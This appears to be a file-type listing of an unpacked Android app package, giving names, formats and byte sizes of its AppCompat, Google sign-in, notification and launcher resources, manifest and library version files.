                        common_google_signin_btn_icon_light_normal_background.9.pngPNG image, 144 x 144, 8-bit gray+alpha, non-interlaced1138
                        $ic_launcher_foreground__0.xmlDBase 3 data file (752 records)752
                        abc_text_select_handle_right_mtrl_dark.pngPNG image, 44 x 22, 8-bit/color RGBA, non-interlaced187
                        common_google_signin_btn_text_light.xmlDBase 3 data file (588 records)588
                        abc_textfield_activated_mtrl_alpha.9.pngPNG image, 19 x 16, 8-bit gray+alpha, non-interlaced186
                        abc_btn_switch_to_on_mtrl_00012.9.pngPNG image, 81 x 81, 8-bit gray+alpha, non-interlaced2834
                        notification_bg_low_pressed.9.pngPNG image, 12 x 12, 8-bit/color RGB, non-interlaced225
                        abc_ic_star_black_36dp.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced364
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 72 x 96, 8-bit gray+alpha, non-interlaced437
                        abc_screen_toolbar.xmlDBase 3 data file (1560 records)1560
                        abc_text_select_handle_middle_mtrl_light.pngPNG image, 60 x 72, 8-bit/color RGBA, non-interlaced753
                        abc_list_focused_holo.9.pngPNG image, 9 x 9, 8-bit/color RGBA, non-interlaced244
                        abc_scrubber_control_to_pressed_mtrl_000.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced415
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 18 x 24, 8-bit gray+alpha, non-interlaced327
                        abc_scrubber_control_off_mtrl_alpha.pngPNG image, 18 x 48, 8-bit gray+alpha, non-interlaced201
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced404
                        common_google_signin_btn_icon_dark_focused.xmlDBase 3 data file (892 records)892
                        abc_tint_edittext.xmlDBase 3 data file (772 records)772
                        androidx.core_core.versionASCII text6
                        common_google_signin_btn_icon_dark_normal.xmlDBase 3 data file (548 records)548
                        abc_textfield_search_default_mtrl_alpha.9.pngPNG image, 12 x 3, 8-bit gray+alpha, non-interlaced178
                        abc_list_selector_disabled_holo_light.9.pngPNG image, 42 x 126, 8-bit gray+alpha, non-interlaced258
                        abc_tab_indicator_mtrl_alpha.9.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced204
                        ic_launcher.pngPNG image, 128 x 128, 8-bit colormap, non-interlaced2004
                        notification_icon_background.xmlDBase 3 data file (372 records)372
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 54 x 72, 8-bit gray+alpha, non-interlaced524
                        abc_list_divider_mtrl_alpha.9.pngPNG image, 1 x 1, 8-bit grayscale, non-interlaced167
                        notification_template_big_media_narrow.xmlDBase 3 data file (1824 records)1824
                        abc_btn_switch_to_on_mtrl_00001.9.pngPNG image, 81 x 81, 8-bit gray+alpha, non-interlaced2463
                        abc_alert_dialog_title_material.xmlDBase 3 data file (1516 records)1516
                        abc_ic_menu_selectall_mtrl_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced305
                        abc_text_select_handle_right_mtrl_light.pngPNG image, 66 x 33, 8-bit/color RGBA, non-interlaced262
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced127
                        notification_template_big_media.xmlDBase 3 data file (1696 records)1696
                        abc_list_selector_background_transition_holo_light.xmlDBase 3 data file (424 records)424
                        androidx.loader_loader.versionASCII text6
                        common_google_signin_btn_icon_light_normal.xmlDBase 3 data file (548 records)548
                        abc_ratingbar_small_material.xmlDBase 3 data file (704 records)704
                        abc_scrubber_control_to_pressed_mtrl_005.pngPNG image, 27 x 27, 8-bit gray+alpha, non-interlaced272
                        abc_text_select_handle_left_mtrl_light.pngPNG image, 132 x 66, 8-bit colormap, non-interlaced420
                        abc_spinner_textfield_background_material.xmlDBase 3 data file (1160 records)1160
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced133
                        abc_btn_default_mtrl_shape.xmlDBase 3 data file (932 records)932
                        activity.xmlDBase 3 data file (852 records)852
                        abc_list_pressed_holo_dark.9.pngPNG image, 18 x 18, 8-bit gray+alpha, non-interlaced212
                        abc_list_pressed_holo_dark.9.pngPNG image, 6 x 6, 8-bit gray+alpha, non-interlaced207
                        abc_list_selector_disabled_holo_dark.9.pngPNG image, 21 x 63, 8-bit gray+alpha, non-interlaced228
                        common_google_signin_btn_text_dark_normal_background.9.pngPNG image, 222 x 96, 8-bit/color RGBA, non-interlaced1086
                        abc_list_focused_holo.9.pngPNG image, 12 x 12, 8-bit/color RGBA, non-interlaced244
                        common_google_signin_btn_text_light.xmlDBase 3 data file (712 records)712
                        notification_action_tombstone.xmlDBase 3 data file (1228 records)1228
                        abc_ic_star_half_black_16dp.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced197
                        abc_list_longpressed_holo.9.pngPNG image, 6 x 6, 8-bit/color RGBA, non-interlaced211
                        common_google_signin_btn_icon_dark.xmlDBase 3 data file (588 records)588
                        abc_dialog_material_background.xmlDBase 3 data file (716 records)716
                        play-services-basement.propertiesASCII text82
                        abc_ic_commit_search_api_mtrl_alpha.pngPNG image, 64 x 64, 8-bit gray+alpha, non-interlaced228
                        abc_text_select_handle_right_mtrl_dark.pngPNG image, 176 x 88, 8-bit colormap, non-interlaced513
                        notification_bg_normal_pressed.9.pngPNG image, 16 x 16, 8-bit/color RGB, non-interlaced247
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced178
                        abc_search_url_text.xmlDBase 3 data file (588 records)588
                        common_google_signin_btn_icon_dark_normal_background.9.pngPNG image, 48 x 48, 8-bit/color RGBA, non-interlaced610
                        abc_btn_check_to_on_mtrl_015.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced593
                        abc_switch_track_mtrl_alpha.9.pngPNG image, 24 x 16, 8-bit gray+alpha, non-interlaced395
                        abc_btn_check_to_on_mtrl_015.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced321
                        androidx.legacy_legacy-support-v4.versionASCII text6
                        abc_ab_share_pack_mtrl_alpha.9.pngPNG image, 16 x 16, 8-bit gray+alpha, non-interlaced267
                        abc_ic_star_half_black_48dp.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced548
                        abc_screen_simple_overlay_action_mode.xmlDBase 3 data file (792 records)792
                        abc_ic_star_half_black_48dp.pngPNG image, 192 x 192, 8-bit gray+alpha, non-interlaced991
                        notification_bg_normal.9.pngPNG image, 16 x 16, 8-bit grayscale, non-interlaced221
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 36 x 48, 8-bit gray+alpha, non-interlaced417
                        abc_ic_star_black_36dp.pngPNG image, 54 x 54, 8-bit gray+alpha, non-interlaced522
                        googleg_standard_color_18.pngPNG image, 54 x 54, 8-bit/color RGBA, non-interlaced1615
                        googleg_standard_color_18.pngPNG image, 18 x 18, 8-bit/color RGBA, non-interlaced562
                        abc_textfield_search_default_mtrl_alpha.9.pngPNG image, 18 x 5, 8-bit gray+alpha, non-interlaced178
                        abc_alert_dialog_button_bar_material.xmlDBase 3 data file (1208 records)1208
                        abc_ic_menu_paste_mtrl_am_alpha.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced226
                        abc_menu_hardkey_panel_mtrl_mult.9.pngPNG image, 96 x 36, 8-bit gray+alpha, non-interlaced738
                        notification_template_custom_big.xmlDBase 3 data file (2456 records)2456
                        abc_switch_track_mtrl_alpha.9.pngPNG image, 35 x 25, 8-bit gray+alpha, non-interlaced484
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced263
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 27 x 36, 8-bit gray+alpha, non-interlaced345
                        ic_launcher_round.pngPNG image, 72 x 72, 8-bit/color RGBA, non-interlaced4905
                        abc_select_dialog_material.xmlDBase 3 data file (976 records)976
                        abc_scrubber_control_off_mtrl_alpha.pngPNG image, 24 x 64, 8-bit gray+alpha, non-interlaced267
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 27 x 36, 8-bit gray+alpha, non-interlaced345
                        abc_list_selector_disabled_holo_light.9.pngPNG image, 13 x 41, 8-bit gray+alpha, non-interlaced217
                        abc_text_select_handle_left_mtrl_dark.pngPNG image, 176 x 88, 8-bit colormap, non-interlaced513
                        abc_cascading_menu_item_layout.xmlDBase 3 data file (1868 records)1868
                        abc_btn_check_to_on_mtrl_015.pngPNG image, 128 x 128, 8-bit gray+alpha, non-interlaced476
                        googleg_disabled_color_18.pngPNG image, 54 x 54, 8-bit gray+alpha, non-interlaced727
                        abc_btn_radio_to_on_mtrl_000.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced464
                        abc_text_select_handle_right_mtrl_light.pngPNG image, 132 x 66, 8-bit colormap, non-interlaced422
                        abc_btn_radio_to_on_mtrl_000.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced984
                        abc_btn_radio_to_on_mtrl_000.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced324
                        abc_scrubber_control_to_pressed_mtrl_005.pngPNG image, 54 x 54, 8-bit gray+alpha, non-interlaced595
                        googleg_disabled_color_18.pngPNG image, 18 x 18, 8-bit gray+alpha, non-interlaced281
                        android.arch.lifecycle_runtime.versionASCII text6
                        abc_slide_out_bottom.xmlDBase 3 data file (396 records)396
                        select_dialog_singlechoice_material.xmlDBase 3 data file (864 records)864
                        abc_textfield_activated_mtrl_alpha.9.pngPNG image, 12 x 11, 8-bit gray+alpha, non-interlaced181
                        abc_cab_background_top_mtrl_alpha.9.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced229
                        abc_textfield_search_activated_mtrl_alpha.9.pngPNG image, 12 x 3, 8-bit gray+alpha, non-interlaced178
                        abc_ic_star_black_48dp.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced887
                        abc_cab_background_internal_bg.xmlDBase 3 data file (372 records)372
                        androidx.versionedparcelable_versionedparcelable.versionASCII text6
                        androidx.cursoradapter_cursoradapter.versionASCII text6
                        notification_template_big_media_narrow_custom.xmlDBase 3 data file (3216 records)3216
                        abc_text_select_handle_left_mtrl_light.pngPNG image, 66 x 33, 8-bit/color RGBA, non-interlaced278
                        abc_ic_star_half_black_48dp.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced310
                        abc_ab_share_pack_mtrl_alpha.9.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced286
                        abc_textfield_search_activated_mtrl_alpha.9.pngPNG image, 24 x 6, 8-bit gray+alpha, non-interlaced184
                        common_google_signin_btn_text_light_focused.xmlDBase 3 data file (892 records)892
                        androidx.legacy_legacy-support-core-ui.versionASCII text6
                        common_google_signin_btn_text_dark_normal_background.9.pngPNG image, 111 x 48, 8-bit/color RGBA, non-interlaced615
                        androidx.vectordrawable_vectordrawable.versionASCII text6
                        abc_btn_radio_to_on_mtrl_000.pngPNG image, 128 x 128, 8-bit gray+alpha, non-interlaced785
                        notification_tile_bg.xmlDBase 3 data file (304 records)304
                        abc_ic_star_half_black_48dp.pngPNG image, 144 x 144, 8-bit gray+alpha, non-interlaced789
                        common_google_signin_btn_icon_light.xmlDBase 3 data file (588 records)588
                        abc_list_longpressed_holo.9.pngPNG image, 9 x 9, 8-bit/color RGBA, non-interlaced212
                        abc_scrubber_control_off_mtrl_alpha.pngPNG image, 36 x 96, 8-bit gray+alpha, non-interlaced322
                        default.ttfdata47169
                        abc_scrubber_track_mtrl_alpha.9.pngPNG image, 15 x 18, 8-bit gray+alpha, non-interlaced196
                        googleg_standard_color_18.pngPNG image, 36 x 36, 8-bit/color RGBA, non-interlaced982
                        play-services-base.propertiesASCII text74
                        abc_tint_default.xmlDBase 3 data file (1120 records)1120
                        abc_vector_test.xmlDBase 3 data file (612 records)612
                        abc_list_selector_disabled_holo_dark.9.pngPNG image, 28 x 84, 8-bit gray+alpha, non-interlaced236
                        abc_primary_text_material_dark.xmlDBase 3 data file (464 records)464
                        notification_template_media_custom.xmlDBase 3 data file (2756 records)2756
                        abc_grow_fade_in_from_bottom.xmlDBase 3 data file (852 records)852
                        abc_ic_commit_search_api_mtrl_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced171
                        abc_ic_star_black_48dp.pngPNG image, 144 x 144, 8-bit gray+alpha, non-interlaced1291
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced260
                        common_google_signin_btn_text_light_normal_background.9.pngPNG image, 222 x 96, 8-bit gray+alpha, non-interlaced808
                        abc_list_pressed_holo_light.9.pngPNG image, 6 x 6, 8-bit gray+alpha, non-interlaced207
                        abc_secondary_text_material_dark.xmlDBase 3 data file (464 records)464
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced705
                        abc_textfield_search_default_mtrl_alpha.9.pngPNG image, 36 x 10, 8-bit gray+alpha, non-interlaced186
                        abc_ic_star_half_black_36dp.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced421
                        abc_ic_star_half_black_36dp.pngPNG image, 144 x 144, 8-bit gray+alpha, non-interlaced760
                        abc_ic_voice_search_api_material.xmlDBase 3 data file (828 records)828
                        android.arch.lifecycle_viewmodel.versionASCII text6
                        abc_alert_dialog_title_material.xmlDBase 3 data file (1352 records)1352
                        abc_ratingbar_material.xmlDBase 3 data file (704 records)704
                        googleg_disabled_color_18.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced516
                        abc_color_highlight_material.xmlDBase 3 data file (544 records)544
                        abc_text_select_handle_left_mtrl_dark.pngPNG image, 44 x 22, 8-bit/color RGBA, non-interlaced203
                        abc_list_pressed_holo_light.9.pngPNG image, 9 x 9, 8-bit gray+alpha, non-interlaced208
                        abc_ic_menu_selectall_mtrl_alpha.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced215
                        abc_ic_menu_overflow_material.xmlDBase 3 data file (792 records)792
                        notification_bg_normal.9.pngPNG image, 8 x 8, 8-bit grayscale, non-interlaced215
                        abc_ic_menu_share_mtrl_alpha.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced389
                        abc_btn_radio_material.xmlDBase 3 data file (464 records)464
                        abc_ic_menu_share_mtrl_alpha.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced700
                        common_google_signin_btn_text_dark_focused.xmlDBase 3 data file (892 records)892
                        abc_textfield_search_activated_mtrl_alpha.9.pngPNG image, 36 x 10, 8-bit gray+alpha, non-interlaced187
                        abc_btn_check_to_on_mtrl_000.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced227
                        abc_screen_toolbar.xmlDBase 3 data file (1504 records)1504
                        abc_ic_menu_paste_mtrl_am_alpha.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced348
                        abc_ic_star_black_36dp.pngPNG image, 144 x 144, 8-bit gray+alpha, non-interlaced1269
                        abc_tooltip_exit.xmlDBase 3 data file (388 records)388
                        androidx.asynclayoutinflater_asynclayoutinflater.versionASCII text6
                        abc_tint_spinner.xmlDBase 3 data file (772 records)772
                        abc_text_select_handle_right_mtrl_light.pngPNG image, 44 x 22, 8-bit/color RGBA, non-interlaced186
                        abc_popup_menu_item_layout.xmlDBase 3 data file (2072 records)2072
                        abc_expanded_menu_layout.xmlDBase 3 data file (388 records)388
                        abc_text_select_handle_left_mtrl_dark.pngPNG image, 88 x 44, 8-bit/color RGBA, non-interlaced336
                        abc_tint_spinner.xmlDBase 3 data file (668 records)668
                        android.arch.lifecycle_livedata.versionASCII text6
                        ic_launcher.pngPNG image, 48 x 48, 8-bit/color RGBA, non-interlaced2060
                        abc_ic_arrow_drop_right_black_24dp.xmlDBase 3 data file (1000 records)1000
                        notification_action.xmlDBase 3 data file (1052 records)1052
                        abc_ic_menu_paste_mtrl_am_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced461
                        abc_cab_background_top_mtrl_alpha.9.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced226
                        abc_ic_star_black_36dp.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced652
                        abc_switch_track_mtrl_alpha.9.pngPNG image, 47 x 32, 8-bit gray+alpha, non-interlaced618
                        abc_ic_menu_share_mtrl_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced899
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced251
                        abc_seekbar_tick_mark_material.xmlDBase 3 data file (516 records)516
                        abc_text_select_handle_middle_mtrl_light.pngPNG image, 40 x 48, 8-bit/color RGBA, non-interlaced585
                        abc_seekbar_track_material.xmlDBase 3 data file (1408 records)1408
                        abc_text_select_handle_middle_mtrl_light.pngPNG image, 20 x 24, 8-bit/color RGBA, non-interlaced310
                        abc_ic_star_half_black_48dp.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced431
                        ic_launcher_round.pngPNG image, 96 x 96, 8-bit/color RGBA, non-interlaced6895
                        abc_textfield_default_mtrl_alpha.9.pngPNG image, 19 x 16, 8-bit gray+alpha, non-interlaced192
                        accessibility_config.xmlDBase 3 data file (728 records)728
                        abc_text_cursor_material.xmlDBase 3 data file (516 records)516
                        abc_textfield_activated_mtrl_alpha.9.pngPNG image, 25 x 22, 8-bit gray+alpha, non-interlaced189
                        ic_launcher.xmlDBase 3 data file (448 records)448
                        androidx.interpolator_interpolator.versionASCII text6
                        MANIFEST.MFASCII text, with CRLF line terminators50796
                        abc_action_menu_layout.xmlDBase 3 data file (576 records)576
                        abc_ic_star_half_black_36dp.pngPNG image, 108 x 108, 8-bit gray+alpha, non-interlaced577
                        abc_text_select_handle_middle_mtrl_dark.pngPNG image, 60 x 72, 8-bit/color RGBA, non-interlaced752
                        androidx.customview_customview.versionASCII text6
                        abc_activity_chooser_view_list_item.xmlDBase 3 data file (1304 records)1304
                        common_google_signin_btn_text_light_normal_background.9.pngPNG image, 111 x 48, 8-bit gray+alpha, non-interlaced465
                        notification_template_lines_media.xmlDBase 3 data file (2872 records)2872
                        abc_btn_borderless_material.xmlDBase 3 data file (588 records)588
                        abc_text_select_handle_left_mtrl_light.pngPNG image, 88 x 44, 8-bit/color RGBA, non-interlaced335
                        abc_text_select_handle_right_mtrl_light.pngPNG image, 88 x 44, 8-bit/color RGBA, non-interlaced318
                        abc_switch_track_mtrl_alpha.9.pngPNG image, 71 x 48, 8-bit gray+alpha, non-interlaced851
                        abc_scrubber_control_to_pressed_mtrl_000.pngPNG image, 18 x 18, 8-bit gray+alpha, non-interlaced196
                        common_full_open_on_phone.pngPNG image, 96 x 96, 8-bit/color RGBA, non-interlaced681
                        abc_scrubber_track_mtrl_alpha.9.pngPNG image, 30 x 36, 8-bit gray+alpha, non-interlaced207
                        abc_ic_menu_share_mtrl_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced480
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 54 x 72, 8-bit gray+alpha, non-interlaced525
                        abc_ic_star_black_16dp.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced263
                        androidx.slidingpanelayout_slidingpanelayout.versionASCII text6
                        abc_btn_check_to_on_mtrl_000.pngPNG image, 64 x 64, 8-bit gray+alpha, non-interlaced281
                        androidx.fragment_fragment.versionASCII text6
                        common_google_signin_btn_icon_dark_normal_background.9.pngPNG image, 144 x 144, 8-bit/color RGBA, non-interlaced1510
                        abc_text_select_handle_left_mtrl_light.pngPNG image, 44 x 22, 8-bit/color RGBA, non-interlaced203
                        abc_list_selector_holo_light.xmlDBase 3 data file (1064 records)1064
                        androidx.coordinatorlayout_coordinatorlayout.versionASCII text6
                        androidx.documentfile_documentfile.versionASCII text6
                        abc_scrubber_primary_mtrl_alpha.9.pngPNG image, 20 x 24, 8-bit gray+alpha, non-interlaced208
                        abc_alert_dialog_button_bar_material.xmlDBase 3 data file (1536 records)1536
                        abc_textfield_default_mtrl_alpha.9.pngPNG image, 38 x 33, 8-bit gray+alpha, non-interlaced200
                        common_google_signin_btn_icon_dark_normal_background.9.pngPNG image, 73 x 73, 8-bit/color RGBA, non-interlaced897
                        notification_template_icon_group.xmlDBase 3 data file (988 records)988
                        common_google_signin_btn_tint.xmlDBase 3 data file (464 records)464
                        abc_list_selector_background_transition_holo_dark.xmlDBase 3 data file (424 records)424
                        abc_textfield_search_material.xmlDBase 3 data file (756 records)756
                        googleg_standard_color_18.pngPNG image, 27 x 27, 8-bit/color RGBA, non-interlaced808
                        ic_launcher_round.pngPNG image, 192 x 192, 8-bit/color RGBA, non-interlaced15132
                        abc_btn_check_material.xmlDBase 3 data file (464 records)464
                        abc_slide_out_top.xmlDBase 3 data file (396 records)396
                        notification_template_media.xmlDBase 3 data file (1292 records)1292
                        abc_secondary_text_material_light.xmlDBase 3 data file (464 records)464
                        notification_bg_low.xmlDBase 3 data file (532 records)532
                        AndroidManifest.xmlDBase 3 data file (12328 records)12328
                        common_google_signin_btn_icon_disabled.xmlDBase 3 data file (1132 records)1132
                        abc_spinner_mtrl_am_alpha.9.pngPNG image, 18 x 24, 8-bit gray+alpha, non-interlaced318
                        abc_list_focused_holo.9.pngPNG image, 6 x 6, 8-bit/color RGBA, non-interlaced222
                        abc_btn_colored_text_material.xmlDBase 3 data file (604 records)604
                        androidx.media_media.versionASCII text6
                        abc_ic_commit_search_api_mtrl_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced224
                        abc_popup_background_mtrl_mult.9.pngPNG image, 64 x 32, 8-bit gray+alpha, non-interlaced776
                        abc_fade_out.xmlDBase 3 data file (388 records)388
                        abc_list_pressed_holo_light.9.pngPNG image, 12 x 12, 8-bit gray+alpha, non-interlaced209
                        abc_background_cache_hint_selector_material_light.xmlDBase 3 data file (468 records)468
                        ic_launcher_round.pngPNG image, 144 x 144, 8-bit/color RGBA, non-interlaced10413
                        abc_btn_colored_material.xmlDBase 3 data file (1716 records)1716
                        googleg_disabled_color_18.pngPNG image, 27 x 27, 8-bit gray+alpha, non-interlaced410
                        abc_btn_radio_to_on_mtrl_015.pngPNG image, 64 x 64, 8-bit gray+alpha, non-interlaced785
                        common_google_signin_btn_text_light_normal_background.9.pngPNG image, 168 x 73, 8-bit gray+alpha, non-interlaced694
                        abc_control_background_material.xmlDBase 3 data file (304 records)304
                        abc_list_selector_holo_dark.xmlDBase 3 data file (1064 records)1064
                        abc_menu_hardkey_panel_mtrl_mult.9.pngPNG image, 192 x 72, 8-bit/color RGBA, non-interlaced1779
                        abc_btn_colored_text_material.xmlDBase 3 data file (500 records)500
                        abc_ic_search_api_material.xmlDBase 3 data file (812 records)812
                        abc_text_select_handle_left_mtrl_dark.pngPNG image, 132 x 66, 8-bit colormap, non-interlaced420
                        abc_item_background_holo_light.xmlDBase 3 data file (1012 records)1012
                        notification_bg.xmlDBase 3 data file (532 records)532
                        abc_popup_enter.xmlDBase 3 data file (508 records)508
                        abc_background_cache_hint_selector_material_dark.xmlDBase 3 data file (468 records)468
                        notification_bg_normal.9.pngPNG image, 12 x 12, 8-bit grayscale, non-interlaced212
                        abc_scrubber_control_to_pressed_mtrl_000.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced403
                        abc_ic_menu_paste_mtrl_am_alpha.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced152
                        abc_list_divider_material.xmlDBase 3 data file (516 records)516
                        abc_tab_indicator_mtrl_alpha.9.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced202
                        abc_ic_menu_selectall_mtrl_alpha.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced139
                        abc_scrubber_control_to_pressed_mtrl_005.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced391
                        abc_text_select_handle_left_mtrl_light.pngPNG image, 176 x 88, 8-bit colormap, non-interlaced513
                        abc_text_select_handle_middle_mtrl_dark.pngPNG image, 20 x 24, 8-bit/color RGBA, non-interlaced311
                        notification_template_part_time.xmlDBase 3 data file (440 records)440
                        common_google_signin_btn_text_dark_normal.xmlDBase 3 data file (584 records)584
                        abc_scrubber_control_to_pressed_mtrl_005.pngPNG image, 18 x 18, 8-bit gray+alpha, non-interlaced197
                        common_google_signin_btn_text_dark_normal_background.9.pngPNG image, 168 x 73, 8-bit/color RGBA, non-interlaced960
                        abc_list_pressed_holo_light.9.pngPNG image, 18 x 18, 8-bit gray+alpha, non-interlaced212
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced905
                        abc_list_selector_disabled_holo_light.9.pngPNG image, 28 x 84, 8-bit gray+alpha, non-interlaced235
                        abc_screen_content_include.xmlDBase 3 data file (548 records)548
                        abc_alert_dialog_button_bar_material.xmlDBase 3 data file (1584 records)1584
                        notification_template_part_chronometer.xmlDBase 3 data file (440 records)440
                        abc_activity_chooser_view.xmlDBase 3 data file (1684 records)1684
                        abc_text_select_handle_middle_mtrl_dark.pngPNG image, 30 x 36, 8-bit/color RGBA, non-interlaced398
                        notify_panel_notification_icon_bg.pngPNG image, 30 x 30, 8-bit/color RGB, non-interlaced138
                        notification_media_cancel_action.xmlDBase 3 data file (744 records)744
                        abc_cab_background_top_mtrl_alpha.9.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced237
                        abc_tint_seek_thumb.xmlDBase 3 data file (604 records)604
                        abc_ic_star_black_16dp.pngPNG image, 16 x 16, 8-bit gray+alpha, non-interlaced193
                        abc_btn_colored_borderless_text_material.xmlDBase 3 data file (464 records)464
                        abc_textfield_default_mtrl_alpha.9.pngPNG image, 25 x 22, 8-bit gray+alpha, non-interlaced187
                        abc_tint_edittext.xmlDBase 3 data file (668 records)668
                        abc_ic_star_black_16dp.pngPNG image, 64 x 64, 8-bit gray+alpha, non-interlaced599
                        abc_alert_dialog_material.xmlDBase 3 data file (2480 records)2480
                        abc_item_background_holo_dark.xmlDBase 3 data file (1012 records)1012
                        androidx.appcompat_appcompat.versionASCII text6
                        notification_bg_normal_pressed.9.pngPNG image, 12 x 12, 8-bit/color RGB, non-interlaced225
                        abc_ic_menu_share_mtrl_alpha.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced270
                        abc_list_selector_disabled_holo_dark.9.pngPNG image, 42 x 126, 8-bit gray+alpha, non-interlaced260
                        ic_launcher.pngPNG image, 72 x 72, 8-bit/color RGBA, non-interlaced2963
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced494
                        abc_btn_check_to_on_mtrl_000.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced307
                        abc_btn_check_to_on_mtrl_000.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced214
                        abc_tab_indicator_mtrl_alpha.9.pngPNG image, 18 x 18, 8-bit gray+alpha, non-interlaced190
                        abc_popup_exit.xmlDBase 3 data file (508 records)508
                        abc_ic_star_black_16dp.pngPNG image, 32 x 32, 8-bit gray+alpha, non-interlaced333
                        common_google_signin_btn_text_light_normal_background.9.pngPNG image, 333 x 144, 8-bit gray+alpha, non-interlaced1255
                        abc_ic_ab_back_material.xmlDBase 3 data file (692 records)692
                        abc_scrubber_track_mtrl_alpha.9.pngPNG image, 10 x 12, 8-bit gray+alpha, non-interlaced194
                        abc_text_select_handle_right_mtrl_dark.pngPNG image, 132 x 66, 8-bit colormap, non-interlaced422
                        switch_thumb_material_dark.xmlDBase 3 data file (464 records)464
                        abc_hint_foreground_material_dark.xmlDBase 3 data file (564 records)564
                        abc_action_bar_item_background_material.xmlDBase 3 data file (264 records)264
                        abc_dialog_title_material.xmlDBase 3 data file (1072 records)1072
                        common_google_signin_btn_icon_light_normal_background.9.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced776
                        ic_launcher_round.xmlDBase 3 data file (448 records)448
                        common_google_signin_btn_text_light_normal.xmlDBase 3 data file (584 records)584
                        abc_btn_colored_borderless_text_material.xmlDBase 3 data file (500 records)500
                        abc_textfield_search_activated_mtrl_alpha.9.pngPNG image, 18 x 5, 8-bit gray+alpha, non-interlaced178
                        abc_tint_seek_thumb.xmlDBase 3 data file (500 records)500
                        abc_scrubber_primary_mtrl_alpha.9.pngPNG image, 30 x 36, 8-bit gray+alpha, non-interlaced210
                        abc_ic_star_half_black_16dp.pngPNG image, 48 x 48, 8-bit gray+alpha, non-interlaced309
                        abc_primary_text_disable_only_material_dark.xmlDBase 3 data file (464 records)464
                        androidx.legacy_legacy-support-core-utils.versionASCII text6
                        abc_menu_hardkey_panel_mtrl_mult.9.pngPNG image, 128 x 48, 8-bit gray+alpha, non-interlaced966
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 96 x 96, 8-bit gray+alpha, non-interlaced327
                        abc_ic_menu_copy_mtrl_am_alpha.pngPNG image, 36 x 36, 8-bit gray+alpha, non-interlaced199
                        abc_switch_thumb_material.xmlDBase 3 data file (464 records)464
                        abc_scrubber_control_to_pressed_mtrl_005.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced631
                        abc_btn_check_to_on_mtrl_000.pngPNG image, 128 x 128, 4-bit colormap, non-interlaced275
                        abc_ic_menu_cut_mtrl_alpha.pngPNG image, 72 x 72, 8-bit gray+alpha, non-interlaced710
                        abc_primary_text_disable_only_material_light.xmlDBase 3 data file (464 records)464
                        abc_slide_in_top.xmlDBase 3 data file (396 records)396
                        abc_tab_indicator_mtrl_alpha.9.pngPNG image, 24 x 24, 8-bit gray+alpha, non-interlaced194
                        notification_bg_low_pressed.9.pngPNG image, 8 x 8, 8-bit/color RGB, non-interlaced223
